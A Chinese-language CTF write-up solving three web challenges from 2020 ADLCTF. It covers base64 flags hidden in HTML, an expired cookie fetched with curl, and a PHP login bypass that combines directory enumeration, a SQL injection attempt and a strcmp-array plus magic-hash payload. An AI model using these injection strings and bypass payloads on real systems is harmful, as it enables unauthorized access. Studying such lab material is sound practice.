# 2020 ADLCTF web write up ###### tags: `CTF` `write-up` ## Hello pika! - `ctrl+u`看src code ```htmlembedded= <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>pika pika</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="css/bootstrap.min.css" rel="stylesheet"> <link href="css/rainbow.css" rel="stylesheet"> <!-- T3BwcyB5b3UgZm91bmQgbWUuIE5pY2UgdHJ5IQo= --> </head> <body> <div class="text-center d-flex justify-content-center flex-column" style="height: 100vh"> <h1><img src="./pika.jpg" width="600" alt="QURMQ1RGe3AxazRfdzB3X3VfQzROX3IzYURfd2U2X1NSYyF9Cg=="></img></h1> <p style="font-size: 3em;"> Say hello to pikachu.<br> Pika Pika. </p> <span style="visibility:hidden">bmljZSB0cnkhCg==</span> </div> <script src="js/jquery-slim.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> </body> </html> ``` - 第14行的`alt=...`拿去base64 decode即是flag ## Hello pika (2) - 看cookie - 有個cookie`flags=QWxtb3N0IHRoZXJlISBUcnkgd2l0aCBjdXJsfg==` ![](https://i.imgur.com/85J0mlh.png) - base64 decode得到`Almost there! Try with curl~` - `curl -I http://ctf.adl.tw:12001` - `-I`:header ![](https://i.imgur.com/PAHlTZs.png) - 發現另一個cookie`_flags=QURMQ1RGe3Bpa2FfdV9mMHVuZF80bl9lWHAxMkVEX2MwMGsxMyF9`,只是已經過期,而**瀏覽器會自動remove掉過期的cookie** - 因此此時去看`F12->network`的http response header或是直接`curl`去抓header都可以看到有setcookie - base64 decode之後就得到flag惹 ## Pika Pika - src code ```htmlembedded= <!DOCTYPE html> <html> <head> <!-- Don't waste time using dirsearch, pika. --> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>pika pika</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="css/bootstrap.min.css" rel="stylesheet"> <link href="css/rainbow.css" rel="stylesheet"> </head> <body> <div class="text-center d-flex justify-content-center flex-column" style="height: 100vh"> <h1><img src="./img/pika_index.png" width="600"></img></h1> <p style="font-size: 3em;"> Pika Pika. </p> <!-- There are no secret files, pika. --> </div> <script src="js/jquery-slim.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> </body> </html> ``` - 第四行叫我不要去dirsearch,我偏要XD - 用[dirsearch](https://github.com/maurosoria/dirsearch),cmd為`python3 dirsearch.py -e php,txt,html -u http://ctf.adl.tw:12002/` - 找到一些神奇的東西 ![](https://i.imgur.com/nom2ooD.png =300x) - 先訪問`.../login.php`,訪問login之後會被導向`.../secret.php`,有個登入頁面 - 嘗試輸入`username=' or 1=1 --`,`password=123`,結果噴`ERR_CONNECTION_RESET` - 再看其他檔案,`.../robots.txt`,這個檔案會放不想讓爬蟲爬到的頁面 ![](https://i.imgur.com/N42Dn2b.png =200x) - 所以戳戳看`.../login.php.bak`,然後就獲得了一個下載下來的檔案`login.php.bak` ```php= <?php $flag = "ADLCTF{????????}"; // TODO $user = $_GET['user']; $pass = $_GET['pass']; if (!isset($user) || !isset($pass)) { header("Location: /secret.php"); //如果沒有get參數user&pass會被重導向到secret.php } else { if (md5($pass) == "0e481756596645574257920728035178" //php弱型別比較 && !strcmp($user, $flag)) { //strcmp也有漏洞 $text = $flag; } else { $text = "PIKA PIKA."; } } ?> ``` - 通過條件為`strcmp($user,$flag)=0`以及`md5($pass)=0e.....` 1. strcmp在比較兩個東西時,如果相等會return 0,但如果噴錯也會回傳NULL,而0==NULL - 因此我們讓中間噴錯 (ex 給`$user`一個array) 2. md5要decode相當困難,因此不可能是去decode 0e... `==`是php的弱型別比較,不一定要同型別才能比較 - ex`0e123`可以被識別為字串或是科學記號$0^{123}$, - 因此`0e48...`可以識別成$0^{48...} = 0$ - 所以我們只要找到一個可以被md5 hash成`0e`開頭的字串即可通過檢查 - ex.`md5(QNKCDZO) = ` `0e830400451993494058024219903391` - 因此訪問`.../login.php?user[]&pass=QNKCDZO`可以得到flag